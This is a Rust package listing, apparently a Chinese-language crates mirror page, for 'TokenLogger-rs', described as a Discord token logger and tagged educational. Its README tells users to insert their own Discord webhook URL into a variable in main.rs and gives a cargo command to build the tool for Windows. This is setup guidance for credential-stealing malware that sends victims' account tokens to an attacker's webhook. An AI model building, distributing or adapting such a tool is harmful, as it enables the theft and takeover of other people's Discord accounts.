1 个稳定版本
2.0.1 | 2022年9月3日 |
---|---|
1.0.0 |
|
0.0.1 |
|
#48 在 #educational
22KB
102 行
TokenLogger-rs
用Rust编写的Discord令牌日志记录器
在main.rs的第7行(如下所示)中,你必须将变量替换为你的webhook URL
let url = "Discord Webhook URL";
要构建,只需执行
$ cargo build --target x86_64-pc-windows-gnu
备注:我讨厌字符串。
依赖项
~5–14MB
~147K SLoC